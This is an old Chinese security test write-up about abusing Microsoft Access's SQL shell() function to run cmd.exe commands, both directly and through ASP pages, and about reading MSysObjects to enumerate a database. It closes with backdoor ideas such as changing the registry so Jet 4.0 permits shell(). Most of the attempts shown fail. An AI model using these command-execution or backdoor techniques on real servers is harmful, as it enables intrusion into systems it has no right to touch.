Access的一些测试

本文作者：SuperHei
文章性质：原创
发布日期：2004-09-16

我们先在accessl里直接sql查询:

SELECT shell('c:winntsystem32cmd.exe /c dir c: >c:123456.txt');

“运行”得到结果:

C:>dir 123456.txt
驱动器 C 中的卷没有标签。
卷的序列号是 3CEE-A8A9

C: 的目录

2004-01-09 22:29 1,718 123456.txt
1 个文件 1,718 字节
0 个目录 1,224,527,872 可用字节
C:>type 123456.txt
驱动器 C 中的卷没有标签。
卷的序列号是 3CEE-A8A9

c: 的目录

2004-01-07 15:35 44 1.txt
2004-07-15 05:15 49 11.txt
2004-01-09 22:29 0 123456.txt
2004-07-31 15:50 478 333.txt

成功执行,我们看看权限，语句改为:

SELECT shell('c:winntsystem32cmd.exe /c dir c: >c:3456.txt');

运行后:

C:>net user

KAK-E8UHOQQ9M6S 的用户帐户

----------------------------------------------
aa Administrator
IUSR_KAK-E8UHOQQ9M6S IWAM_KAK-E8UHOQQ9M6S
命令成功完成。

看来权限比较大(不过可能是继承了运行access的用户的权限,我用的是管理员权限运行的,对guest的没有测试)

下面我们测试sp里执行,首先自己写个asp,代码如下:

< %
Set Conn = Server.CreateObject("ADODB.Connection")
dsn="Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&Server.MapPath("q.mdb")
Set Rs = Server.CreateObject("ADODB.Recordset")
Conn.Open dsn
SQL = "select shell('c:winntsystem32cmd.exe /c dir c: > d:sss1.txt')"
rs.open sql,conn
if rs.eof and rs.bof then
' Access Denied
else
' Access Allowed
end if
rs.close
set rs=nothing
'关闭连接
conn.close
set conn=nothing
response.write "sql为：" &sql

%>

运行这个asp,返回结果如下:

Microsoft VBScript 编译器错误 错误 '800a03f6'

缺少 'End'

/iisHelp/common/500-100.asp，行242

Microsoft JET Database Engine 错误 '80040e14'

表达式中 'shell' 函数未定义。

/test/lse/Connections/kaoo6.asp，行7

提示” 'shell' 函数未定义”,测试失败,我把asp代码里的
dsn="Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&Server.MapPath("q.mdb")
改为 dsn="Provider=Microsoft.Jet.OLEDB.3.5;Data Source="&Server.MapPath("q.mdb")

运行ie返回:

Microsoft VBScript 编译器错误 错误 '800a03f6'

缺少 'End'

/iisHelp/common/500-100.asp，行242

ADODB.Connection 错误 '800a0e7a'

Provider cannot be found. It may not be properly installed.

/test/lse/Connections/kaoo8.asp，行5

Provider没有安装 没有继续测试.

2.关于暴库的测试

这里使用MsysObjecs : 我们新建立个查询,语句如下:

SELECT MSysObjects.DateCreate,MSysObjects.DateUpdate,SysObjects.Name,ysObjects.Type ROM MSysObjects;
MSysObjects.DateCreate 得到建立时间
MSysObjects.DateUpdate 更新时间
MSysObjects.Name 数据库名称
MSysObjects.Type 数据库类型

我们执行上面的语句,直接得到结果:

我们放到asp里:

< %
Set Conn = Server.CreateObject("ADODB.Connection")
dsn="Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&Server.MapPath("q.mdb")
Set Rs = Server.CreateObject("ADODB.Recordset")
Conn.Open dsn
SQL = "SELECT MSysObjects.DateCreate,MSysObjects.Name,MSysObjects.Type FROM MSysObjects;"
rs.open sql,conn
if rs.eof and rs.bof then
' Access Denied
else
' Access Allowed
end if
rs.close
set rs=nothing
'关闭连接
conn.close
set conn=nothing
response.write "sql为：" &sql

%>

ie返回:

Microsoft VBScript 编译器错误 错误 '800a03f6'

缺少 'End'

/iisHelp/common/500-100.asp，行242

Microsoft JET Database Engine 错误 '80040e09'

不能读取记录；在 'MSysObjects' 上没有读取数据权限。

/test/lse/Connections/kaoo7.asp，行7

提示 不能读取记录；在 'MSysObjects' 上没有读取数据权限。 没办法了,这个办法又夭折拉.

3.补充:

在iis5(Microsoft.Jet.OLEDB.4.0)我们不可以直接执行shell(据说在Jet 3.5 也就是在iis4的时代可以),在Jet.OLEDB.4.0默认的情况下不可以,但是可以设置,我们可以通过改注册表等来实现,具体的不知道.

后门思路:

1,就是上面的改注册表,让Jet.OLEDB.4.0支持shell 这样我们可以在asp里直接利用.
2.我们通过其他程序,直接对mdb文件操作,利用select shell()执行系统命令.

（编辑：李大同）

【声明】本站内容均来自网络，其相关言论仅代表作者个人观点，不代表本站立场。若无意侵犯到您的权利，请及时与联系站长删除相关内容!